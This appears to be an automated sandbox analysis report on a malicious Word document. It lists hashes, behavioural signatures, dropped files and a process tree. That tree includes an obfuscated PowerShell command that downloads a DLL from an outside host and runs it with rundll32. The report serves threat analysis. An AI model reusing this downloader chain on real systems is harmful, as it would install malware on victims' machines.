Analysis
-
max time kernel
145s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 04:19
Behavioral task
behavioral1
Sample
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
-
Size
392KB
-
MD5
5d26fff174b5864a0fd899ccb8c9a3fb
-
SHA1
dd8726066ddae317bb9415b994e82b8d3c89eb18
-
SHA256
54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
-
SHA512
524fdc7a602a22d6a0cc662fb89ed3a69491177414f40ede8a0441e2f02292d57b505e6ba03804f413a70f825e41f1420e258128a43967257c515a7fc1ce0246
-
SSDEEP
6144:niIpBWik+MmAQoMfMWDceTo59x9r+RSwujd+Ao7pt:iIprkNmAQo0MWDcTbKQTjLott
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
xea_kueou0.exepid process 4944 xea_kueou0.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4984 WINWORD.EXE 4984 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xea_kueou0.exepid process 4944 xea_kueou0.exe 4944 xea_kueou0.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
xea_kueou0.exedescription pid process Token: SeDebugPrivilege 4944 xea_kueou0.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEpid process 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE 4984 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXExea_kueou0.exedescription pid process target process PID 4984 wrote to memory of 4944 4984 WINWORD.EXE xea_kueou0.exe PID 4984 wrote to memory of 4944 4984 WINWORD.EXE xea_kueou0.exe PID 4944 wrote to memory of 948 4944 xea_kueou0.exe rundll32.exe PID 4944 wrote to memory of 948 4944 xea_kueou0.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exeC:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp ';$bqgddecgsiiajzoourpmbdeayguxj='cur';$sq_aqnpeltdkhy_idwjrpgmqq_ufzty='et-Da';$ijfkefmziiwkqqxy='shops.';$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb='File(''';$idrypqufftaiazps='yste';$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo=' $path ,';$fsyy_cy_ydewla_a_yeifzavusld_e='ll32';$txjyexcuyf_moyzdaaylgqru='ecutionP';$aef_noyxiax_puskee='ad = G';$brraekqxipsc_u='m 4';$acgyap_iqwholxtyekmd_xoayczaumoao='0 + 11.';$tmi_hibeeyaxhueiswapcwr='y Bypass';$e_utyoesneikpukijvwxeamahf_ii='t-D';$gdzgogct_uzouwzezekvialzuqoi='ase.dll''';$uy_aywtlioixpgipyixqufajvjnfk_a='et';$kzfwuwzbhtztiihor_rhaiscfboclhe='77;if';$qpb_elgvzsl_iqmfch='lcnad -g';$kgeyoiapuoiutzvlkft_f_bnbmioasyv='eep -';$uiieeutyymuyscizu62='){';$cnyjzkyeff_uobpdkcas='t-Sl';$ei_oefjuuyalgvsyjxnewacxtxr='tem (';$iivobpybzsthaoopoisugotiiiieduhhr08='rmat';$jptjeey_kzmhoaosrugpervewfwzsvvs='[doubl';$xknnmepjaanpebhypu='ppdat';$igeoekzbisdoztezqosdyeuokg='1){ $';$vxzopznvaorxujcbx='te -UFo';$p_lmbqvpyzegfzwimu='w-Obje';$pstxzidydhkykpkknua='m.';$ieenx_au_yycve_svmhohfeaxessifksygx='se -forc';$alfwlkamnera=' %s;Star';$ao_mbuayqujiyyapwsniiue='move-I';$wcfdjjedlijj0='//groovy';$somgplgrotbymcrajk_y='e;';$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp='rocess;';$lzbwawc_sfiygjoyuucrzy_aii='http:';$auijlrquyuonww_xotmtfapkxbzyaoeea64='e $qgyx'; Invoke-Expression ($jptjeey_kzmhoaosrugpervewfwzsvvs+$eikoia_yblegbmybniemxea_ogwepz+$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4+$fm_lzloaflyqunl_rrvjpmd+$e_utyoesneikpukijvwxeamahf_ii+$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5+$ua_wybbegalseqrkkigmuueik+$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es+$s_bvcqmepdogzwmoqwr_uscmigyassarl+$uymddyuwrfj_truyyqv+$natpxmhofkbbeb_huseueei+$acgyap_iqwholxtyekmd_xoayczaumoao+$qdkp_tslelwso_iuwnaby_np+$wmqaligua_xjensemze+$igeoekzbisdoztezqosdyeuokg+$rlhio_vzhdxeytzwdajcaio+$aef_noyxiax_puskee+$sq_aqnpeltdkhy_idwjrpgmqq_ufzty+$vxzopznvaorxujcbx+$iivobpybzsthaoopoisugotiiiieduhhr08+$alfwlkamnera+$cnyjzkyeff_uobpdkcas+$kgeyoiapuoiutzvlkft_f_bnbmioasyv+$brraekqxipsc_u+$kzfwuwzbhtztiihor_rhaiscfboclhe+$mzoiuddeyajlqncmnrvpotqghzbopauau+$qpb_elgvzsl_iqmfch+$auijlrquyuonww_xotmtfapkxbzyaoeea64+$uiieeutyymuyscizu62+$tcozygiwfcyinfvnu_euqaocnlecylzi+$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz+$sgagyyoabqaaaioi+$vbsif_aeknkgtcrajatpyktombewksswo+$atke_aahgy_awuhinj_yarqjoiagbdomxcm+$txjyexcuyf_moyzdaaylgqru+$uziux_cxljaau+$tmi_hibeeyaxhueiswapcwr+$yamzywruogbpvbyuunmq97+$ytr_ulakmoxieyuuqsa+$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp+$cfruonrvvuhve_ixrbnpdclveyouklainlriu+$wvmbvwoxkjuhjt+$xknnmepjaanpebhypu+$mwyzyn_vhaa_gzewtucmxgu+$uy_aywtlioixpgipyixqufajvjnfk_a+$gdzgogct_uzouwzezekvialzuqoi+$bxauxi_gdiqlvelokehc+$p_lmbqvpyzegfzwimu+$ubgieohxfasnveuauyunvnyyafalf_tuf+$idrypqufftaiazps+$pstxzidydhkykpkknua+$okeygvmueodiuuyuz+$iu_ebbubieeuynqayu_rcpfykziuepqojd02+$mdroaenb_esuwo+$aooajmeeiyupyyusaqxznw+$kayrdaavkijoqmiiieadeowqbw+$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb+$lzbwawc_sfiygjoyuucrzy_aii+$wcfdjjedlijj0+$ijfkefmziiwkqqxy+$oaibfxvjiowlxxw_iekfpfyiuuoycid+$uso_dl_vwzkeeskgpp_ibvewjmr+$aoauapzujgioje_xidu_aaibeabsc87+$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki+$iiqjwpysluziyi+$fsyy_cy_ydewla_a_yeifzavusld_e+$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo+$oauwfabx_dhpjo_iodh_ulpunmfktuavteai+$ao_mbuayqujiyyapwsniiue+$ei_oefjuuyalgvsyjxnewacxtxr+$yitmzuozoufzu_lficf_gdhpoeuqao2+$byadiryyayieeidgqqmjrgeactagkrpexhu+$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf+$ulhqbioxuairmxscoeywdo+$ieaetbrqnosgobb+$c_qwtnvmm_mwitcyidseg+$wtoxtvoiougt_y+$bqgddecgsiiajzoourpmbdeayguxj+$ieenx_au_yycve_svmhohfeaxessifksygx+$somgplgrotbymcrajk_y);2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f13⤵PID:948
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
461B
MD58624762990fa5970a2cb25cba70e9ad4
SHA130e18f1bb325f85290c85131fc2232c141c8086f
SHA2569f51461c6bb0fa44dea4b80d3bfd23e266ba2592e2f4c29d004c7f01a14e078a
SHA5122dbda62735c575cae5fbec87405fe9d128f6797b4710c3ca14232c6ce6509910e122e8be04a1e8168e90a7a75750889cc2188132bce146ff76b981e86b9deeec
-
Filesize
939B
MD5a435337450cca0b15e2f7d0a517fc196
SHA1f39825a759eeac97c45c392d67ffbe769e773631
SHA256ad52dcce99fb4ba321539a2b4f0a41a4697d4a5acccbd579c87304ce112dd789
SHA512f4773ffc5e5c5e3bb07511102a86b8f0f8c3168c87b4dffdf04085d046ec461825e1a7e927bcde9ed4604063c69ecd064b0e27825bc3623060e50df8dd29bcdd
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppBackgroundTask\MSFT_BackgroundTask.Format.ps1xml
Filesize8KB
MD5ab0750d48cecbcb02a7c5789dfb48fea
SHA1bea351f2f8865b324e4e2675036d4ee9d041cad4
SHA2562306d7187dd8363510bdea30286f94c66d79b7d49839127bb3d8ebc0a5c92931
SHA512baeb2b726ed2f606250e0951c16601eec4d067fde658b15eaa334affd21221335458d8b5f63a2687afb8bbaee8dac9b4b933a7f41b9a7d0824f43ccb11630886
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppBackgroundTask\Microsoft.Windows.AppBackgroundTask.Commands.dll
Filesize8KB
MD5c1b1a3859afa48daa8aece53f2be4aa7
SHA1cc76e13900bd7b9f5905cc2b32220a9b76426013
SHA256274ab9d5c70440808954b71f5ae6f8d7d32e89bd0fd397c6946b03a1cbfa822b
SHA5121a33381cfa45f20c60435878f7591a38ea7c1a05812f420a142ab01d0ed3349df849230ba260422915865011e085a27110af63acd6055bbc53b4cb2d3dd130f8
-
Filesize
3KB
MD54bf10ae3558ae24cb8b43e50648f7a15
SHA19cb88809119aaab49b97ed51f485a4a995e673df
SHA256a742e5566f7995c67e0bed3a57e2132b86b2b5145b77a2ceb0b05311cf210d8b
SHA512c3d3d3b4bee302f8b2120977ddd8c7ccb1dcb24661836e7e47b3acb3e7f267ff8dd314cce5ef0ef2039cefc929933a1aeaaf9ec68e3a999579ae62137680ecbd
-
Filesize
1KB
MD5b256cc30236dd3644edab6ba5be79bf0
SHA1fc27293d9ef98e98529e08e2d20993b80c4cbe1d
SHA256e77667408440f70b278c4ad101ff012bffbe4340567885a7187e9b49da664152
SHA512d40f4d7ddd2ae8d2e32a022583bc1ffc2d3cd0d1df2bbadb11c303ccc0ec0d68342bdb44768d3c876149eb637c80ee8875884488db37dfbd4a5212699b3b0fea
-
Filesize
4KB
MD51f2a10fb3af5dee4b300fe87b9f2b762
SHA126d4f4beb82b3ec969e7b579e34512aa2fddb265
SHA256e742a405fae2d9ea37ae7b16e9866afadf75b1dde2940a520aa0417dc5f91a52
SHA5124e43519697d1e4caa161fabd1dd1f35676d390e06b9a817829a87e15fab7e77b6da23d63431332f18d6269fcb28f653f61da2490a0a305bd9ee0008d5e7a4959
-
Filesize
7KB
MD5a7707eb2d7938e7e976eff010a88bf65
SHA1d6d6656aa3375e35cb23f95662b3045142977d9a
SHA256cd32996ba34772f476b8182ef2ceec35db676a6b7ef464a4cfd19711d9008f5c
SHA512f8b1e999b82b05de589a4108d7245f60e3fa521788dad5de54e4a39994ad6ccc9f729d9ca1df4720216876496d8c23adbe54ce51b3b2a0f1f9dde760e6640962
-
Filesize
690B
MD5688db1c53ac6df0854cf9fb309c422d2
SHA11015e1f5558bbb802be436fb43ce2ca481e1d326
SHA256ad9899ce95f910745ae61af63a4019cc6f14de5212650c13726050a6c12dac95
SHA51257083cf15e0d2a6ed9b526f4946bfba1291f6bf6901bcb815a16106e7d51e24ea5d433f8ccde9426cf8b7efb06cc1336d1aeedc08a928311171e168a328f6d1f
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
Filesize106KB
MD5b64fb69698b85925bb93384fd23e3666
SHA1d99b3153dd290011692be5ed02f19d0fe2de4938
SHA256a32140fe3c71495aab3ef1d20351b31ae79227064cc386e9b89cb15dec1aa3ae
SHA512fadaffdcbbf7a4213edc7a8528f54c136810d9a7625a8a19f3fdac994391d5914cf58cb46d92792eb663729036e4a6cdfa47640e2d7ddb7a17a009a15d93bbaf
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\Microsoft.AppV.AppvClientComConsumer.dll
Filesize692KB
MD55afc88b709ddeba08bf11b9bfa24e0c8
SHA129cf65b82a7b30e9b0757be184c1f7ea2cbb2ca2
SHA256893c0cf07822855e2a24b68109efdad5755f66f0a2abb38c35eb43fa146d6b06
SHA512ecdc880976243ee371a8cf74b413a50d4c5cb66ff9c70c096e586539dd97607a36bdabf975cb20730dfe07f07c2f79efffd3a491896e7541a2ff60b98d972e7f
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\Microsoft.AppV.ClientProgrammability.Eventing.dll
Filesize168KB
MD5ab8fff7c748827da8129d5ee56677dd5
SHA155a184ce8791d2ec855aae3ca1947a2ccb9a1da4
SHA256cba5760d92ca5d9759ee9307dc440bd91ad117971862c66815ad33524da68b19
SHA5125ca6e5872ee10634d333eb55c1eddfe0aa68c4371b9d0460188f51a78a93935c1c6fab386e595bdcf95b5e22ed4ac7276f9eda9868b91294ab9674f86818f782
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\de\Microsoft.AppV.AppVClientPowerShell.resources.dll
Filesize9KB
MD529d5054773af6a6b229bac2cf502bd04
SHA1629e20219f8f3514192614d923015179f6eca030
SHA2568bdad23590c410667af957e2de6d92ab9b1137a10c063c4316d0d89ce18e19ef
SHA512b529f0289ac1f02e462a08d7c304b42e36e02365b9d75673c483536e2d836c88bd63f7347a7e260039edc1340f26d00d6e4ea5c984b7ec060d2e146a32b7b6e0
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\de\Microsoft.AppV.AppvClientComConsumer.resources.dll
Filesize24KB
MD5f2ee99ecaf5904176991cf5cbaad4a6c
SHA155243cf971d5c7925fa9e1be475bab03321dc204
SHA2563aea95de429c43728a63e89d7e67ca756e50ab3350564b459d31be57ca6fc9e5
SHA51269aa35b13c314f13a7f82326ce9a4b332d0343101792bd61860f51170ba63b35caee1c416965e7cb5ce180b65f8762bfff36de8e3e65e8996b9b7256fdcfea41
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\en\Microsoft.AppV.AppVClientPowerShell.resources.dll
Filesize8KB
MD5183959fba796120321a17230a9285995
SHA136d19b3aaa38ac24579b3a313a71c39761793ec5
SHA256b265401e187d8729dd9a461c4587b7255cfa5573af32e4a1f38b5e82de26b0b9
SHA5121094a836130699ebb4c9bb6a23ee2f3436d17d3db8f0272b3e57b521661a692ef90b6d2a124abb466bbcdff202abbf0cbd33cdc408aecccce557184a0677d85a
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\en\Microsoft.AppV.AppvClientComConsumer.resources.dll
Filesize21KB
MD58cbd55742616636d8ddb2dee710ad8d1
SHA1b3df57b87f9e15a6212482fe0efcf201e7b9f6d5
SHA2564b42bccb95f9d5d8ee1e6434b1334121e0459a5b164cf80c6fd88fa6f752fde4
SHA51202a35696a0e7cf9ef2bbac5c58aaba58e2188041deab36e7dd4c9645b2ef51e1b6cefd259909febaeb7241c16987b0ef42b155ea406c2b746ebea29360de2592
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\es\Microsoft.AppV.AppVClientPowerShell.resources.dll
Filesize9KB
MD5b648c61c141697e9c92c328224764ba3
SHA18b5b16ede6c9207a9bb4e5f12537f9ef04d8843f
SHA256dec4d8b29b7f3cf048d032ae5e3ca7e55786f6b5882d4152a322f6c859bd5f43
SHA512c707b3e42ac491888a72b1af673de85f9a6d4bde54df0ed2bed1a106f78aa8a9d5a1c97a2886aa45a40ec1d5ac1b8c010507991ba7d1a9fea0ca274ee65b986c
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\es\Microsoft.AppV.AppvClientComConsumer.resources.dll
Filesize23KB
MD5291262c0b30c6c684395e2bf68f69520
SHA13508f42060534063de126d60c297beb1adaa459e
SHA2569eaa0122233b3204b0ef205869775dc804ada921868a92a8472808ff6ac88bb9
SHA512f5ef0faec0fe2fa9e76a99dbe35e8672d35a75e5e8670097912302cc4e6b7ecff9f93f8a3678aa9ffdf0e05b9be1ca635609d214ad018358ff4165e477735df4
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\fr\Microsoft.AppV.AppVClientPowerShell.resources.dll
Filesize9KB
MD595df6a71a0a27bd6c420c691f79456ea
SHA14bc1bae6d5200d4a0fdab7a2a6357d258bbd3c63
SHA256fb1dd81d378cdae0117e07f0158f5255ce9533b6a958535e2885599d27d9e548
SHA512e7040b65a3bc569cc3b65d2371af0a706f8cda01ae1bc5a04be6dca450d893252ab07f7fe9f0dca5e8585abcde2c4f7fcfbc551e9cbaa989af2a03868fd1b55f
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\fr\Microsoft.AppV.AppvClientComConsumer.resources.dll
Filesize23KB
MD5dbfe070b6502d7a767e1a5ed6065e03f
SHA157cd3d45226196af2064f945717c95f6be83e155
SHA2561bbb62c09f7c6bcd0b5545936f1315cbef970d4f17355dc48b59027cad8d3281
SHA512f928daec1510b2bfc36b2b55493a3a4b64ae2974d7b18055f857225ed75c5063fc6b6e994bb55a7a9278b9a3b64f39080703392907a7d2e8acc07e029b9324ae
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\it\Microsoft.AppV.AppVClientPowerShell.resources.dll
Filesize8KB
MD575480675c225ecd8f888a935a166ab65
SHA1a8e449fb586978a3971569f1e30da08b074d3a12
SHA256af185329634c456091457de7201f2f6fcf39e01229a426a441d8725a0748516e
SHA512660f53032cd44ffcd3f45aebc3934fb23522a2416af85134443d2f92395136ba77f132db0d7f3c58ba79a595f49650bb6f42f4e2fd75e8b10bf0e638b69398ac
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\it\Microsoft.AppV.AppvClientComConsumer.resources.dll
Filesize23KB
MD5d1a1b6bf767633c99dc98c05d9f0ac0e
SHA14f98bd5cda366ea768b935187ac57539a5b23b07
SHA25695207714e50b8a16fefb190531946926af1af7793ddd69350e530a72b4daafb7
SHA5120d6b2b1e12d55f35aad1653d7cf20cd75f7e4ca8e8e5e1243f648266ac24509147febdc9794974a380638109c559520401fe757a1768baf5b65dcb054059b4ad
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\ja\Microsoft.AppV.AppVClientPowerShell.resources.dll
Filesize9KB
MD5a7104a309595fb7d09c994a6a45f0e9d
SHA18e102d46fef873177aeb5aa5a412da4d3432d2bf
SHA2560c59d6fd05990702a3b9ae39817062f6421121c8de7eda976fef6b7d40ebb7e4
SHA5121c9f2b5f6ae1f53d301a78c8a53234ffa2591cee5e1254efb391d7165274413722ac07aecc007b0e62ba7b241a8f31eca503a56e8ca673a6aaf7b159e9c743d7
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\ja\Microsoft.AppV.AppvClientComConsumer.resources.dll
Filesize26KB
MD51cab64158b6e7c81c884ff3d00ab607f
SHA1b3aee64f43820c0e459d847c2c0ce571eff60fd0
SHA256996f61ac0dc3b3706d851c1cfa6fba63c2647eb2d19013de5c558d1a23e3bab7
SHA51241983f30cbbf88512c1f7eae21f3d028f4bc6bb0da832bd8402f85513f0c0574e0bd51f71036f6af24d7f8ecaf2d5bfbb14c2e74ed750fd7fb4b94c4ca2e17fb
-
Filesize
5KB
MD53833600c604d36a91570a1079c7d5eba
SHA1cf6519bec45d3ca40703cd6fc30429acb06a320f
SHA256a9428f01a42ad39e53c0f26345563cda3c4e5c42444598819f8d9c3c8e697b86
SHA5124fab68b2a160ce695c01a043e3146d040036dcfb180cee67f5df77ed1fa23b4f07a3679da6ff66c6d24f5d3c943484cfdacef49cfea7a85d6b1a42da73b7158f
-
Filesize
1KB
MD5d00de325b5c93cc48eb5ce8ac8faee3e
SHA1e6daf9fee1f146b48b37d155ce0298bd13e033ae
SHA2568bf4b9e9d6f45570f2de2c063e5d900c112bb30f970e18b52fb5fb79986752fa
SHA512863f5b30883bd97cae97a640e37764b543d4537854fdc999773139444562b1cf0b5a5a4a322664e9e9a4f833144a0170e3590549172b2548e5a861977488f691
-
Filesize
145B
MD5f155a6f6c63628cf9a92c9128d7c71ac
SHA198f1a59deadf9e1a0feda8843b99c0c5c37793dd
SHA25628070c08778a59d67fca74471710a16785ccdff77a0c3ddec356e872ec816c89
SHA5125f1f5ec18055b25523df4cef73cd1521189088a895bdfe96176bd14be9678294bc16ea3c6f5ade8cec25e7d705050a186e9ae8e6fad8a457842fb4fe55099e4d
-
Filesize
145B
MD5c76295915508b333d75b93ad58830bd7
SHA14e49f66a4c33a1bdd292ec0fc69f46e11632849f
SHA256203d8b4b9e226e23077a61692d01f37621bff4f8917442b0aefaf881d2b50b0c
SHA512308c58a8fa4212a308a7563dfe76dd17a3861c2094015e7dc24023434fb0108f6bc60f9a7eb3cc3f2ffa06a435bed29cf7bbfbec4410006c5b0bb84403b049b9
-
Filesize
145B
MD565d08b78e09621fa39fc268956a9bf6b
SHA15ebe5dc25953a44fdf9287e5b9ba0563618ec5b7
SHA256bce7870266bb247a64d91fe349f2c27e274e23e6ed3cd3d4d6113c117e615dbf
SHA5125c0626640beb19cb5e472dbf3afa7ff7fddc934342f97586dbf6013b5f2d7f45db006bded1b6f29e1ec11290377bfbcb7a5f18a4e4a80aa0a1d077632e80cc25
-
Filesize
145B
MD5a0dc6ee7c37af95a8f640eaf39036ffb
SHA153a640de324abb20db91f724e3b5c402fcb85a40
SHA25635414be264dd2d2755385c85ed1c446b165c590d0702261e4d495495bfb8b219
SHA512beb604a669e1a4c2c4e6d5488b53da82dce324d4dc498b98b3f088bbe99345114d6e9f941eee118ef6d73563b10abad7a39ce42edef8605611e80e3c2078922c
-
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\NetSecurity\it\Microsoft.Windows.Firewall.Commands.Resources.dll
Filesize5KB
MD5d8fbcf4494a827061d390a8b26f30946
SHA1c707a5f072498a3d2c09ba026cf46bcc48245f64
SHA256d763a02a6b08ad1a4c0b5d4cebe6840e425bb69cffe084c27874386be5366572
SHA5120280e212b957d42b507e0f71651c7c061b44cca977af4f0f135fe6fe4129ee4e0caf9323539b7c459875cd00ccd7f214dad99bbbff99bfc10dc4365f6aad885e
-
Filesize
60KB
MD58d729ac5f427b0ce0242344ee8e59474
SHA112374374e8bf61eb844c369402dfa4578ed29c4d
SHA256d35cf4aac422469e58f5abfdd88fcddef53d4cf2fa584542983f44cefbe5cfbe
SHA512590cb080f8bc7d4a6bdf3e7e33b8467b167a91eab9afeff30da235f93bfdc12eae7be02277e365676434b3894dad8ac1f6f1825dbabf9830528f574c28f8b84e
-
Filesize
3KB
MD556b0b822141c6493d168c2f4a6c00ea2
SHA137211f21dcf7a8fe4d4e5fdf0004a01436b9a84d
SHA25680ba892518ce815e29b8700f0c0a0115bccd469a5f9a1fee844d667c2d638018
SHA512f59d83b892f357329bc4a78b8e6b934ae9cd92196bc5c0ff60d28f6948fe0d6ad503d013585e164288e066293bf240b3859ae0f5e0b6974572a3e1849913b8a4
-
Filesize
13KB
MD52a5b4104b7a9efbca6152d0bdd308171
SHA1a843bb15e01911d1d437879f8af0cbb2a54c6ddc
SHA256728ffe1ea4742df25881b06237c5e992058e5ef52bb901c1c7ea95db4e39ee16
SHA512d5162833720dfac1120b436ff24670fb5c62d3f4d01a46bb84ea45aff2300bfdcfb6bc2777338be5db25beb11377e58b57400f3e3e1158e185e6c7ec06e9f868
-
Filesize
6KB
MD5e804730ef25694e34d8afffae1d96b6f
SHA1b0082570e22683be2f41a2136127cb9d7a6072a0
SHA256a967414e07465352b1b6a2361a4a4d7efbdfffa96264e7feea6562b423574184
SHA512442bebbbbe4c0f8a0741ccbc8cedf0b93709c4ef5ed4ead2f57420745f92f8ed1bf72032a8b6d735fe723d3287183e2d275ce1936cb8368d265cf86e2fd3fc02
-
Filesize
5KB
MD560e7e41ea8d49b7ccfbc888aa57576f4
SHA169425f009227f807a9747d9cc200d2c052257d2e
SHA256073d4a0dd76c5372b3d10c489541b11f2f143ced7f028527f0ed41f5fa25259c
